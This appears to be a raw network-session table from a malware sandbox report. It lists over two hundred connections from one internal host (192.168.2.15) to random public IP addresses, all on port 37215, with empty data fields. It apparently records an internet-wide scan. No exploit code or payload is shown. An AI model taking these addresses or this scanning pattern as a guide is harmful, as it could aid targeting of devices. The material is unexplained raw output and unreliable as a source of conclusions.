                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5729192.168.2.1551822102.35.210.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5730192.168.2.153919037.148.184.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5731192.168.2.1551410102.108.32.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5732192.168.2.154439241.18.140.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5733192.168.2.1547272157.111.155.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5734192.168.2.1556818157.127.171.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5735192.168.2.1547054102.195.192.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5736192.168.2.1548116197.142.183.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5737192.168.2.153837845.70.61.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5738192.168.2.1534846157.80.70.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5739192.168.2.154366237.5.160.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5740192.168.2.154169637.232.245.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5741192.168.2.1547588197.161.39.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5742192.168.2.1549640121.92.206.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5743192.168.2.154372431.159.70.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5744192.168.2.1538298138.252.10.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5745192.168.2.1538836156.49.55.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5746192.168.2.1533446222.236.232.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5747192.168.2.1555364190.164.210.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5748192.168.2.1555000222.32.166.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5749192.168.2.1547828138.200.155.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5750192.168.2.155232094.247.89.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5751192.168.2.1554812222.142.134.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5752192.168.2.1540364222.136.101.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5753192.168.2.1558152157.83.32.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5754192.168.2.1554998190.65.241.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5755192.168.2.155914845.117.232.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5756192.168.2.1536240157.54.154.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5757192.168.2.154293637.247.133.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5758192.168.2.1546702186.77.240.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5759192.168.2.1560044186.37.157.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5760192.168.2.1535426157.43.124.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5761192.168.2.154259237.77.120.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5762192.168.2.1549414186.207.179.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5763192.168.2.1538076102.205.21.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5764192.168.2.1553576222.142.131.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5765192.168.2.154100844.155.58.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5766192.168.2.1548050197.155.32.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5767192.168.2.1536080102.23.38.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5768192.168.2.155406637.236.214.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5769192.168.2.154604031.169.23.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5770192.168.2.1552940122.157.190.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5771192.168.2.154698441.65.81.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5772192.168.2.1558022121.236.52.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5773192.168.2.154471894.64.85.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5774192.168.2.1554358160.66.207.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5775192.168.2.154421260.113.116.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5776192.168.2.1540716121.56.15.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5777192.168.2.153643845.7.58.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5778192.168.2.154365441.173.239.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5779192.168.2.1543042197.126.216.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5780192.168.2.1555228157.219.55.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5781192.168.2.1551124222.156.180.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5782192.168.2.1535132156.8.222.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5783192.168.2.1535690102.39.128.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5784192.168.2.155899237.249.20.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5785192.168.2.1550506121.209.31.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5786192.168.2.1537840121.110.44.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5787192.168.2.153715831.171.14.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5788192.168.2.1540904156.152.71.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5789192.168.2.156085280.136.181.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5790192.168.2.1546428138.3.225.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5791192.168.2.154783488.244.150.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5792192.168.2.155959037.252.82.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5793192.168.2.1540650186.69.94.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5794192.168.2.1539098186.223.228.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5795192.168.2.155930445.6.90.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5796192.168.2.153501245.126.162.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5797192.168.2.155266631.161.80.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5798192.168.2.1544876102.9.217.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5799192.168.2.156052641.238.241.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5800192.168.2.1560258186.72.203.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5801192.168.2.1551460181.203.46.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5802192.168.2.1558678222.0.103.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5803192.168.2.1559230138.134.35.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5804192.168.2.1550360181.214.96.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5805192.168.2.1545932122.245.130.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5806192.168.2.153927041.103.14.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5807192.168.2.153358894.93.63.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5808192.168.2.153816094.70.195.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5809192.168.2.153885245.107.41.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5810192.168.2.1546656197.207.33.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5811192.168.2.1541338181.102.196.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5812192.168.2.1557790222.253.109.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5813192.168.2.1548396197.18.133.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5814192.168.2.1536568157.165.92.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5815192.168.2.1558038222.240.131.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5816192.168.2.156063845.105.156.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5817192.168.2.155296437.216.234.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5818192.168.2.1550312121.248.180.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5819192.168.2.1549728138.135.254.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5820192.168.2.1541542222.21.198.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5821192.168.2.1537242156.32.89.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5822192.168.2.1554498138.132.66.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5823192.168.2.1553016197.164.222.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5824192.168.2.1546112121.131.229.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5825192.168.2.1534798156.206.202.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5826192.168.2.1550432102.28.152.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5827192.168.2.1559946197.185.184.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5828192.168.2.1550266190.229.35.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5829192.168.2.1534478102.84.102.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5830192.168.2.1547316122.158.211.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5831192.168.2.1560662122.208.83.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5832192.168.2.1556580190.67.125.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5833192.168.2.1559968181.25.251.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5834192.168.2.154663645.75.218.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5835192.168.2.1542290186.239.234.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5836192.168.2.1535960156.72.114.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5837192.168.2.154370831.210.89.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5838192.168.2.1534864122.228.41.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5839192.168.2.1554564190.229.182.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5840192.168.2.1533096222.237.84.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5841192.168.2.155142812.165.98.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5842192.168.2.1549922157.195.193.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5843192.168.2.155301037.110.119.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5844192.168.2.1535544156.238.213.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5845192.168.2.155520237.12.227.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5846192.168.2.1542294209.43.125.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5847192.168.2.155186094.107.243.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5848192.168.2.1550892190.105.33.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5849192.168.2.1547226190.239.39.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5850192.168.2.1547428186.232.170.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5851192.168.2.1556236102.38.104.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5852192.168.2.1559774222.191.253.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5853192.168.2.1549638122.178.97.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5854192.168.2.154843445.164.118.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5855192.168.2.1553450121.27.8.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5856192.168.2.1558728181.146.173.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5857192.168.2.155793441.13.223.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5858192.168.2.1543444186.151.11.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5859192.168.2.1556588181.95.8.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5860192.168.2.1543650190.64.215.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5861192.168.2.1539210102.236.224.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5862192.168.2.1542286102.245.201.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5863192.168.2.155821494.84.76.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5864192.168.2.1535816156.112.13.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5865192.168.2.155183294.146.32.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5866192.168.2.1542788186.201.26.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5867192.168.2.1552836222.189.160.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5868192.168.2.1550076190.10.42.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5869192.168.2.1534126157.182.11.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5870192.168.2.1539214157.164.214.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5871192.168.2.1550820197.186.213.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5872192.168.2.1557034157.109.0.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5873192.168.2.155656231.194.56.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5874192.168.2.1558198186.224.1.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5875192.168.2.154989283.84.25.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5876192.168.2.155958037.206.201.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5877192.168.2.1550480157.192.228.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5878192.168.2.153389045.118.7.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5879192.168.2.1553044157.180.71.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5880192.168.2.1559128121.157.59.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5881192.168.2.155783637.19.104.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5882192.168.2.1535860138.98.68.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5883192.168.2.155025637.77.120.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5884192.168.2.1545838186.212.1.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5885192.168.2.154203841.37.76.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5886192.168.2.1542642102.134.47.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5887192.168.2.153392037.78.149.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5888192.168.2.1540494138.38.144.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5889192.168.2.155656041.80.73.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5890192.168.2.1555754197.253.83.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5891192.168.2.1560472222.51.248.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5892192.168.2.1552018156.209.245.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5893192.168.2.1533684138.226.153.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5894192.168.2.153545494.87.17.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5895192.168.2.1539160186.62.149.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5896192.168.2.1554042121.202.63.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5897192.168.2.1548742182.202.92.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5898192.168.2.154300437.107.179.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5899192.168.2.155043045.48.165.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5900192.168.2.154952437.240.226.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5901192.168.2.1556330156.242.137.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5902192.168.2.1536180120.251.206.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5903192.168.2.1545468156.108.69.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5904192.168.2.155343645.92.178.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5905192.168.2.154985245.243.38.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5906192.168.2.1533854177.230.220.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5907192.168.2.155907431.9.17.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5908192.168.2.153555645.215.14.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5909192.168.2.1551852190.209.128.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5910192.168.2.1541162186.15.17.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5911192.168.2.1539818197.30.182.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5912192.168.2.154558441.253.18.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5913192.168.2.1546134102.229.222.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5914192.168.2.1545058121.195.166.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5915192.168.2.154391637.130.172.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5916192.168.2.155074037.53.45.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5917192.168.2.153874031.102.143.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5918192.168.2.1560522157.129.101.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5919192.168.2.155778237.140.151.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5920192.168.2.156054841.129.175.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5921192.168.2.155646231.18.177.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5922192.168.2.1557006157.102.21.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5923192.168.2.1542328190.96.168.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5924192.168.2.1539928222.215.96.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5925192.168.2.154025441.249.26.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5926192.168.2.1555472181.251.139.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5927192.168.2.1551134186.162.204.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5928192.168.2.1554632121.89.2.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5929192.168.2.1551890190.77.25.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5930192.168.2.155959637.26.25.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5931192.168.2.155121294.159.57.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5932192.168.2.153563041.226.154.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5933192.168.2.1543560102.229.48.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5934192.168.2.1547396222.76.156.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5935192.168.2.154917837.44.11.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5936192.168.2.155221237.197.63.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5937192.168.2.1546596197.16.36.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5938192.168.2.153702441.3.231.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5939192.168.2.1550724190.191.116.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5940192.168.2.1542856122.251.14.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5941192.168.2.1553530197.44.102.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5942192.168.2.153913294.146.220.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5943192.168.2.155865437.91.121.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5944192.168.2.154024031.35.43.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5945192.168.2.155532894.183.198.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5946192.168.2.1536412156.85.110.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
